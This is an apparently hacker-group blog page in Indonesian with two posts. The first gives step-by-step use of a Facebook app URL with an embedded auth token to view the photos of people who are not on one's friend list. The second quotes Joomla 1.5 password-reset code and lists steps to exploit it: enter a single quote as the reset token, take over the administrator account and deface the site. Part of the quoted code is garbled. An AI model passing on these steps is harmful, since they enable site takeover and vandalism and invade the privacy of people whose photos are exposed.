Ternyata Facebook (FB), tak luput dari bug's ..... 11:10 AM

bug pada Facebook, terdapat pada http://apps.facebook.com/josh_owns .... ???   | bug ini, membuat kita (facebook'er) bisa melihat semua foto2 profile/album/wall dari seseorang yang tidak terdaftar pada friendlist kita (kita bisa melihat semua foto2 profile/album/wall facebook'er yang lain tanpa harus melakukan added kedalam friendlist kita)

begini caranya :

1. yang jelas, kita harus login dulu ..

2. buka tab baru atau browser baru, dan masukan alamat ini http://apps.facebook.com/josh_owns/?auth_token=a50e2e3539b419697854dd9f5b45eb6a

3. tinggal masukan .. nama target yang mau di lihat fotonya

4. nah tuh , munculkan .. kalian tinggal pilih2 dulu kalo mau invite atau  added temen2 yang kalian ngak kenal ! tinggal milih yang cantik2 (berlaku untuk cowok)... pilih yang cakep2 kayak gw wkwkwkwkwk (berlaku untuk cewek)

[Thank's All - ZuRigColl]

.:READ MORE:.

Joomla Template's 1.5 Bermasalah 11:24 PM

Ternyata, Joomla template 1.5 punya masalah yang sangat fatal | --- harus segera di patch

. Let's check

point pertama terletak di ".. /components/com_user/controller.php "

Answer : Why ?
Question :

1. this "../components/com_user/controller.php"

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input //permintaan terhadap token------ Post method//
$token = JRequest::getVar('token', null, 'post', 'alnum'); <-- [One Mistake's]

// Get the model
$model = &$this->getModel('Reset');

// Verify the token//konfirmasi terhadap token ---- ternyata .. minta reset password browww//
if ($model->confirmReset($token) === false) < --- [Two Mistake's]
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=
confirm', $message);

return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=
complete'); <--- [nah Ini dia Injeksinya, rubah complete dengan confirm]
}

2. this "../components/com_user/models/reset.php"

function confirmReset($token)
{
global $mainframe;

//wiihhh kena deh tuh pasword di reset .... kacian yah //
$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);

return true;
}

coba deh di test dengan SQl Injection
step 1 .. inject target dengan : index.php?option=com_user&view=reset&layout=confirm
step 2 .. keluar tuh token .. isikan token dengan " ' " | tanpa tanda kutip dua
step 3 .. nah loo. suruh reset password ...
step 4 .. masuk ke menu administrator
step 5 ... sediakan kopi, marlboro + snack ... "deface maaannnng"

sorry guy's just share

[Thank's All - ZuRigColl]

.:READ MORE:.